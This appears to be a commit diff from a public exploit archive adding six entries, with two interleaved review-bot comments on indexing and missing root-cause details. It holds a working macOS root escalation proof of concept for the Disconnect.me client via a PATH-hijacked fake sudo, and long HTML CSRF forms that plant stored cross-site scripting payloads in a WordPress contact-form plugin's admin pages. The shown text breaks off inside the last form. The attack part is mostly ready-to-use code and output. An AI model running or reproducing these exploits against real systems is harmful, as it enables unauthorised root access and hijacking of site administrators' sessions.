DB: 2015-09-07

6 new exploits
Offensive Security 2015-09-07 05:02:07 +00:00
parent a15ab9b097
commit 488f57ec93
8 changed files with 1239 additions and 601 deletions


@ -34384,7 +34384,13 @@ id,file,description,date,author,platform,type,port
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
38090,platforms/php/webapps/38090.txt,"FireEye Appliance Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
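Review bot: the two rows for id 38075 (author zedsec390 on one, "Bigendian Smalls" on the other) only reconcile with the hunk header's -7/+13 counts if the first is the removed line and the second its replacement, so this hunk bundles an author correction to an existing entry with the six new rows and the rendered view has dropped the +/- markers; the commit message ("6 new exploits") should mention the correction rather than leave it to be inferred from line counts. Separately, the new rows break the ascending id order of files.csv: 38086 is inserted between 38075 and 38076, and 38085 follows 38078; placing 38085, 38086, 38087, 38089, 38090 and 38091 together after 38078 keeps the id column usable as a sorted key and avoids merge conflicts with the next batch.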

platforms/osx/local/38089.txt Executable file

@ -0,0 +1,30 @@
Disconnect.me is the search engine entrusted by the Tor Browser.
Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day).
Original Download <= v2.0: https://disconnect.me/premium/mac
Archived Download: http://d-h.st/LKqG
Disconnect+Desktop.pkg: sha256 = bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7
https://www.virustotal.com/en/file/bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7/analysis/
PoC:
"""
$ id
uid=501(...) gid=20(staff) ...
$ cat /tmp/sudo
#!/bin/bash
/usr/bin/id
/bin/bash
$ chmod +x /tmp/sudo
$ PATH=/tmp "/Library/Application Support/disconnect/stopvpn"
uid=0(root) gid=0(wheel) ...
# /usr/bin/whoami
root
"""
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
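Review bot: the root cause is never stated: the transcript shows that "/Library/Application Support/disconnect/stopvpn" ends up running as root and resolves `sudo` through the caller-supplied PATH, but not why it runs with root privileges (a setuid bit on the file, or a privileged helper that invokes it), and no `ls -l` of the binary or the offending line of the script is included, so a reader cannot verify the claim or judge the scope of a fix. Add the file's ownership and mode, name the fix (invoke helpers by absolute path under a fixed PATH rather than trusting the environment of an unprivileged caller), and add a vendor-contact timeline, since the entry is labelled 0day without one; the sha256 and VirusTotal link identify the sample but say nothing about the defect.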

platforms/php/webapps/38086.html Executable file

@ -0,0 +1,667 @@
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form field: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img&#32;src&#61;x>" />
<input type="hidden" name="id&#95;form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="tooltip&#95;text" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="id&#95;form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="column&#95;type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="field&#95;margin&#95;top" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC ]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC ]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
without knowing.
Update template: when the victim accesses the link, will update information of the template identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
==============================
create a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa&quot;&gt;&lt;img&#32;src&#61;x&gt;" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;587&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;588&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;131&#93;" value="inherit" />
<input type="hidden" name="styles&#91;589&#93;" value="1" />
<input type="hidden" name="styles&#91;629&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;630&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;627&#93;" value="0" />
<input type="hidden" name="styles&#91;0&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;130&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;517&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;518&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;1&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;2&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;3&#93;" value="solid" />
<input type="hidden" name="styles&#91;4&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;5&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;6&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;7&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;8&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;9&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;10&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;11&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;12&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;13&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;14&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;15&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;16&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;17&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;18&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;19&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;600&#93;" value="0" />
<input type="hidden" name="styles&#91;601&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;602&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;603&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;604&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;605&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;606&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;607&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;608&#93;" value="solid" />
<input type="hidden" name="styles&#91;609&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;610&#93;" value="0" />
<input type="hidden" name="styles&#91;611&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;612&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;613&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;614&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;615&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;616&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;617&#93;" value="0" />
<input type="hidden" name="styles&#91;618&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;619&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;620&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;621&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;622&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;623&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;624&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;625&#93;" value="solid" />
<input type="hidden" name="styles&#91;626&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;20&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;21&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;22&#93;" value="normal" />
<input type="hidden" name="styles&#91;23&#93;" value="normal" />
<input type="hidden" name="styles&#91;24&#93;" value="none" />
<input type="hidden" name="styles&#91;25&#93;" value="left" />
<input type="hidden" name="styles&#91;506&#93;" value="inherit" />
<input type="hidden" name="styles&#91;510&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;27&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;28&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;29&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;30&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;190&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;191&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;192&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;502&#93;" value="left" />
<input type="hidden" name="styles&#91;193&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;194&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;195&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;196&#93;" value="solid" />
<input type="hidden" name="styles&#91;197&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;198&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;199&#93;" value="normal" />
<input type="hidden" name="styles&#91;200&#93;" value="normal" />
<input type="hidden" name="styles&#91;201&#93;" value="none" />
<input type="hidden" name="styles&#91;202&#93;" value="inherit" />
<input type="hidden" name="styles&#91;511&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;203&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;204&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;205&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;206&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;215&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;216&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;217&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;218&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;31&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;32&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;33&#93;" value="normal" />
<input type="hidden" name="styles&#91;34&#93;" value="normal" />
<input type="hidden" name="styles&#91;35&#93;" value="none" />
<input type="hidden" name="styles&#91;36&#93;" value="left" />
<input type="hidden" name="styles&#91;507&#93;" value="inherit" />
<input type="hidden" name="styles&#91;512&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;37&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;38&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;39&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;40&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;41&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;42&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;43&#93;" value="normal" />
<input type="hidden" name="styles&#91;44&#93;" value="normal" />
<input type="hidden" name="styles&#91;509&#93;" value="inherit" />
<input type="hidden" name="styles&#91;46&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;47&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;48&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;49&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;505&#93;" value="white" />
<input type="hidden" name="styles&#91;508&#93;" value="inherit" />
<input type="hidden" name="styles&#91;132&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;133&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;168&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;519&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;520&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;500&#93;" value="left" />
<input type="hidden" name="styles&#91;501&#93;" value="left" />
<input type="hidden" name="styles&#91;134&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;135&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;136&#93;" value="solid" />
<input type="hidden" name="styles&#91;137&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;138&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;139&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;140&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;141&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;142&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;143&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
